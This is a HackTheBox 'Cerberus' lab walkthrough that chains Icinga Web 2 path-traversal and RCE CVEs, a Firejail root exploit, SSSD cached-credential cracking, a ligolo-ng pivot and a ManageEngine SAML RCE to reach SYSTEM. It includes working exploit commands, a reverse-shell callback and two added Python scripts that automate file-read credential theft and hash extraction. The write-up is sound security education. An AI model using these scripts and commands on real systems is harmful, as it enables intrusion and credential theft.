Cerberus is a hard machine from HackTheBox. It involves exploiting file-read and RCE CVEs in Icinga Web 2 to get a foothold, escalating privileges with a local privilege escalation CVE in Firejail, recovering cached domain credentials from SSSD, pivoting to the DC, and finally getting SYSTEM by exploiting an RCE in ManageEngine ADSelfService Plus.
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
Port 8080 (HTTP)
In the nmap scan, we found that port 8080 is open and redirects to icinga.cerberus.local, so let's add it to the /etc/hosts file. Then, navigating to the website, we get the following login page.
Icinga is an open-source computer system and network monitoring application. While searching on Google about it, I came across the following blog post, which details recent CVEs in Icinga Web.
Path Traversal Vulnerabilities in Icinga Web (Sonar): https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
Arbitrary File Disclosure (CVE-2022-24716)
Trying out the PoC given in the blog, we can successfully read arbitrary files from the system:
curl -s http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts
Everything after the lib/icinga/icinga-php-thirdparty/ prefix is resolved against the server's filesystem, so any file readable by the web server user can be fetched. From the resources.ini file, we can get the credentials for the Icinga login:
curl -s http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
Using the credentials (matthew / IcingaWebPassword2023, the same ones passed to the exploit later), we can log in to Icinga Web.
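The following script is an added example (not code from the page or from the Icinga project) that wraps the curl PoC above: it builds the traversal URL for an arbitrary absolute path, checks that the traversal actually works by reading /etc/passwd, and parses resources.ini for database credentials. The traversal prefix is the one from the PoC; the function names, the User-Agent and the sample ini text are assumptions constructed here.

```python
#!/usr/bin/env python3
"""Arbitrary file read via the Icinga Web 2 path traversal (CVE-2022-24716).

Added example: builds the traversal URL, fetches files through it and parses
resources.ini for credentials. Only the traversal prefix comes from the PoC on
the page; everything else here is constructed for illustration.
"""
import configparser
import sys
import urllib.request

# Static-file route that resolves the rest of the path on the server's
# filesystem instead of inside the library directory.
TRAVERSAL_PREFIX = "lib/icinga/icinga-php-thirdparty"


def traversal_url(base_url: str, filepath: str) -> str:
    """Build the URL that reads `filepath` (absolute path on the target) through the traversal."""
    return base_url.rstrip("/") + "/" + TRAVERSAL_PREFIX + "/" + filepath.lstrip("/")


def fetch_file(base_url: str, filepath: str, timeout: float = 10.0) -> str:
    """Read a remote file; raises urllib.error.HTTPError (403/404) if it is not readable."""
    req = urllib.request.Request(traversal_url(base_url, filepath),
                                 headers={"User-Agent": "Mozilla/5.0"})  # assumed UA
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def is_vulnerable(base_url: str) -> bool:
    """Cheap check: /etc/passwd fetched through the traversal must start with the root entry."""
    try:
        return fetch_file(base_url, "/etc/passwd").startswith("root:")
    except Exception:
        return False


def parse_resources_ini(text: str) -> dict:
    """Extract connection details from every resource section that carries credentials.

    Icinga writes quoted values (username = "matthew"), so the quotes are stripped.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    creds = {}
    for section in cp.sections():
        sec = cp[section]
        if "username" in sec and "password" in sec:
            creds[section] = {
                key: sec[key].strip().strip('"')
                for key in ("type", "db", "host", "dbname", "username", "password")
                if key in sec
            }
    return creds


# Constructed sample in the layout of /etc/icingaweb2/resources.ini; not the real file.
SAMPLE_RESOURCES_INI = """\
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
port = ""
dbname = "icingaweb2"
username = "dbuser"
password = "dbpass"
charset = "utf8"
use_ssl = "0"
"""

if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://icinga.cerberus.local:8080/icingaweb2/"
    if not is_vulnerable(base):
        sys.exit("traversal did not return /etc/passwd; target may be patched")
    ini = fetch_file(base, "/etc/icingaweb2/resources.ini")
    for name, res in parse_resources_ini(ini).items():
        print(f"[{name}] {res.get('username')}:{res.get('password')} db={res.get('dbname', '?')}")
```

The /etc/passwd check is there so the script fails loudly on a patched host instead of reporting an empty credential list; on a live target, also pull /etc/icingaweb2/config.ini and authentication.ini, which name the resource the web login actually uses.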
Remote Code Execution (CVE-2022-24715)
The blog mentioned above also provides the details for exploiting the authenticated RCE in Icinga Web 2, but I will be using the following PoC to exploit this CVE.
GitHub - JacobEbben/CVE-2022-24715: Authenticated Remote Code Execution in Icinga Web 2 <2.8.6, <2.9.6, <2.10
Running the exploit without arguments shows the options we need to provide. Among them is a private key (PEM) file, since the exploit expects a valid PEM-formatted private key. It can be generated with the following command:
ssh-keygen -t rsa -m pem -f ./mykey
(-t rsa matters on newer OpenSSH releases, where the default key type is ed25519 and cannot be written in PEM format; -f names the file that is passed to the exploit with -e.)
Now that we have everything we need, we start a listener on port 4444 and run the exploit, which gives us a reverse shell as www-data on the box.
python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2/ -I 10.10.14.30 -P 4444 -u matthew -p IcingaWebPassword2023 -e ./mykey
Firejail PrivEsc (CVE-2022-31214)
While enumerating, we found that firejail is a SUID root binary. Searching on Google shows that it has a known privilege escalation vulnerability; the following resource provides the PoC to exploit it.
oss-security - firejail: local root exploit reachable via --join logic (CVE-2022-31214), Matthias Gerstner, 8 Jun 2022: https://www.openwall.com/lists/oss-security/2022/06/08/10
The post says that Firejail version 0.9.68 and older are vulnerable, so checking the version on the machine (firejail --version) confirms that it is vulnerable. Download and transfer the Firejail exploit onto the target. When run, it prints a command to run in another terminal. So we pop another shell and run the given command; after that we can simply switch to the root user, using the exact command the exploit's output names.
Post Compromise Enumeration
After some enumeration, we can tell that this machine is domain joined. Looking at the /etc/hosts file, we get the IP of the DC.
Since this is a domain-joined Linux machine, a Google search turned up the following: sssd on a Linux system is responsible for enabling the system to access authentication services from a remote source such as Active Directory. We can confirm that it is in use on this system by looking at its config file, /etc/sssd/sssd.conf.
The following resource shows that we can extract credentials from the SSSD cache database: SSSD Privilege Escalation | Exploit Notes, https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sssd-privilege-escalation/
So, as root, we move into the SSSD cache directory (/var/lib/sss/db, which is not readable by unprivileged users) and run strings on the cache .ldb file for the domain; this gives us a username and, in the cachedPassword attribute, a sha512-crypt hash. Cracking the hash with John, we get the password of the matthew domain user.
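The following script is an added example (not from the page, SSSD or Exploit Notes) that automates the strings step above: it scans a cache_<domain>.ldb file for user records and cachedPassword values and prints user:hash lines for John. The sysdb DN layout (name=<user>@<domain>,cn=users,cn=<domain>,cn=sysdb) and the sha512-crypt format ($6$<salt>$<86 chars>) are SSSD and libcrypt conventions; the default cache path, the nearest-preceding-DN heuristic and the sample bytes (whose hash is fake) are assumptions made here.

```python
#!/usr/bin/env python3
"""Recover cached domain credentials from an SSSD cache database.

Added example, not code from the page. Scans /var/lib/sss/db/cache_<domain>.ldb
for user DNs and cachedPassword attributes and emits john-ready lines. The
sample bytes at the bottom are constructed; their hash is not a real password.
"""
from __future__ import annotations

import re
import sys

# sha512-crypt as written by libcrypt: $6$ [rounds=N$] salt (<=16 chars) $ 86-char digest.
HASH_RE = re.compile(rb"\$6\$(?:rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}")
# Distinguished name of a user object in the sysdb cache.
USER_DN_RE = re.compile(rb"name=([^,\x00]+),cn=users,cn=([^,\x00]+),cn=sysdb")
ATTR = b"cachedPassword"


def extract_cached_credentials(blob: bytes) -> list[tuple[str, str]]:
    """Return unique (user, hash) pairs found in the raw cache file.

    Heuristic (assumption, verify against strings output): ldb writes a record's
    DN before its attributes, so the owner of a cachedPassword value is taken to
    be the nearest user DN preceding it. A hash with no preceding DN is kept
    under '?' rather than dropped.
    """
    dns = [(m.start(), m.group(1).decode(errors="replace")) for m in USER_DN_RE.finditer(blob)]
    results: list[tuple[str, str]] = []
    for attr in re.finditer(re.escape(ATTR), blob):
        hash_match = HASH_RE.search(blob, attr.end())
        if not hash_match:
            continue
        owner = "?"
        for pos, user in dns:
            if pos < attr.start():
                owner = user
            else:
                break
        pair = (owner, hash_match.group(0).decode())
        if pair not in results:
            results.append(pair)
    return results


def john_lines(pairs: list[tuple[str, str]], strip_domain: bool = True) -> list[str]:
    """Format pairs as user:hash; john detects sha512crypt from the $6$ prefix."""
    out = []
    for user, h in pairs:
        name = user.split("@", 1)[0] if strip_domain else user
        out.append(f"{name}:{h}")
    return out


# Constructed sample in the shape of two sysdb user records: the first has a
# cached credential, the second (a decoy) has none. FAKE_HASH is not a real hash.
FAKE_HASH = b"$6$saltsalt$" + b"A" * 86
SAMPLE_CACHE = (
    b"\x00\x00name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb\x00"
    b"objectClass\x00user\x00uidNumber\x001234\x00"
    b"cachedPassword\x00" + FAKE_HASH + b"\x00"
    b"name=svc@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb\x00"
    b"objectClass\x00user\x00uidNumber\x005678\x00"
)

if __name__ == "__main__":
    # Assumed default path; the domain part of the file name comes from the page.
    path = sys.argv[1] if len(sys.argv) > 1 else "/var/lib/sss/db/cache_cerberus.local.ldb"
    with open(path, "rb") as f:  # needs root: the db directory is not world-readable
        data = f.read()
    pairs = extract_cached_credentials(data)
    if not pairs:
        sys.exit("no cachedPassword hashes found (sssd caches hashes only with cache_credentials = True)")
    for line in john_lines(pairs):
        print(line)  # save to a file and run: john --format=sha512crypt <file>
```

Hashes are only present when sssd.conf has cache_credentials = True for the domain, which is the setting that makes offline logins possible and is why this works on a box that is otherwise fully domain-integrated.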
Pivoting to DC
Since the DC is on another network, we need to establish a tunnel to pivot to it. I will be using ligolo-ng for this task.
GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface: https://github.com/nicocha30/ligolo-ng
Download ligolo-proxy and run the following commands on our box to create the TUN interface and route the DC's network (172.16.22.0/24, from the /etc/hosts entry found earlier) through it.
# on kali ('plugin' is the local user that will run ligolo-proxy)
sudo ip tuntap add user plugin mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.22.0/24 dev ligolo
Now we need to transfer the ligolo-agent to the target machine and run the following command (the proxy is started with a self-signed certificate, which is why the agent is told to ignore it).
./agent -connect 10.10.14.30:11601 -ignore-cert
Once the connection is established, we select the new session in the ligolo-proxy console and start the tunnel from there.
Now that the tunnel is up, we can interact with the DC directly. Using crackmapexec, we confirm that the credentials work on the DC over WinRM.
crackmapexec winrm 172.16.22.1 -u matthew -p 147258369
Using evil-winrm, we log in to the server and get the user flag.
While enumerating, looking at Program Files, we found the ManageEngine folder, which contains an ADSelfService Plus folder. ADSelfService Plus is an identity security solution used for password management on the domain. This service runs on port 9251. Since it has a web interface, I tried to open it in the browser through the tunnel, but it did not load. Curious, I port-scanned the DC from the Linux machine with a static nmap binary and found that it had only one open port. But from the shell on the DC, we can see that port 9251 is listening. Presumably the host firewall only allows the port to be reached locally, so connections coming from the Linux host are filtered.
The next step was to transfer the Windows ligolo-agent to the DC and connect it back to our host, then switch the ligolo session to this new agent and start its tunnel. Because the agent now runs on the DC itself, traffic we send to 172.16.22.1 originates locally on the DC and is not affected by the firewall rule. Now, when we open https://172.16.22.1:9251/ in our browser, it redirects to dc.cerberus.local, so let's add this to our /etc/hosts file as well. Opening the URL, we get the following login page. Using matthew's credentials, we can log in, but it says that we are not authorized to view the page.
ManageEngine ADSelfService Plus Unauthenticated SAML RCE (CVE-2022-47966)
There is nothing else we can do there. Searching on Google, I came across a recent CVE in ManageEngine ADSelfService Plus, which can be exploited with Metasploit.
ManageEngine ADSelfService Plus Unauthenticated SAML RCE (Rapid7 module): https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/
To run the Metasploit module, we need to set some options, especially GUID and ISSUER_URL. The GUID appears in the URL in the screenshot above where it says unauthorized. For the issuer URL, the expected value can be found on Google. After providing all the options, the configuration looks like the following. Running the exploit, we get a shell as SYSTEM.
- Icinga Web 2 path traversal (CVE-2022-24716), Sonar blog: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
- CVE-2022-24715 (RCE) advisory: https://github.com/Icinga/icingaweb2/security/advisories/GHSA-v9mv-h52f-7g63
- Firejail exploit (CVE-2022-31214), oss-security: https://www.openwall.com/lists/oss-security/2022/06/08/10
- SSSD abuse, Exploit Notes: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sssd-privilege-escalation/
- Ligolo-ng: https://github.com/nicocha30/ligolo-ng
- ManageEngine Metasploit module (PR): https://github.com/rapid7/metasploit-framework/pull/17527
- ManageEngine CVE-2022-47966 module, Rapid7: https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/